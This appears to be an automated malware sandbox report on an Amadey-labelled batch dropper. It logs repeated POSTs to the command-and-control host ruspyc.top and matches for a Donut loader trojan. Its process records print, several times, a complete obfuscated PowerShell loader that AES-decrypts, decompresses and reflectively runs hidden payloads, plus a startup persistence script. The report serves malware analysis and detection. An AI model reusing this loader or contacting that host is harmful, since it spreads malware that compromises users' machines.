Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: Joe Sandbox View ASN Name: FUSIONPS FUSIONPS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: ruspyc.top
Source: unknown HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: powershell.exe, 00000005.00000002.2039556612.00000000071C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microKY
Source: powershell.exe, 00000004.00000002.2096258913.00000000075E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microT
Source: powershell.exe, 00000004.00000002.2080347912.00000000065F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2037759383.0000000005918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3266003264.0000000006BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2154577260.00000000048C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3222573186.0000000003347000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3299704805.0000000007900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3299704805.0000000007958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php
Source: powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php(
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php10(1).cr
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php7
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php=
Source: powershell.exe, 0000000B.00000002.3299704805.00000000079E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php?
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpC
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpR
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007988000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpRo
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpTl
Source: powershell.exe, 0000000B.00000002.3222573186.000000000331B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpZ
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007988000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.php_9y
Source: powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpb/
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007988000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpeaL
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpg
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007988000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpitW
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpk
Source: powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpm32
Source: powershell.exe, 0000000B.00000002.3308194663.000000000877A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpncalrpc:
Source: powershell.exe, 0000000B.00000002.3299704805.00000000079B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpon
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpp
Source: powershell.exe, 0000000B.00000002.3222573186.0000000003347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phppv8
Source: powershell.exe, 0000000B.00000002.3299704805.0000000007990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ruspyc.top/j4Fvskd3/index.phpq
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.2069596451.0000000004D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2036156838.00000000048B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3229826918.0000000005331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2154577260.0000000004771000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.2154577260.00000000048C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2035279040.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka..winsvr
Source: powershell.exe, 00000004.00000002.2069596451.0000000004D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2036156838.00000000048B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3229826918.0000000005331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2154577260.0000000004771000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.2154577260.00000000048C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2080347912.00000000065F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2037759383.0000000005918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3266003264.0000000006BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: 0000000B.00000002.3308756546.0000000008971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2232648300.000000000935E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2214765602.00000000081D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2223463037.00000000091DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in 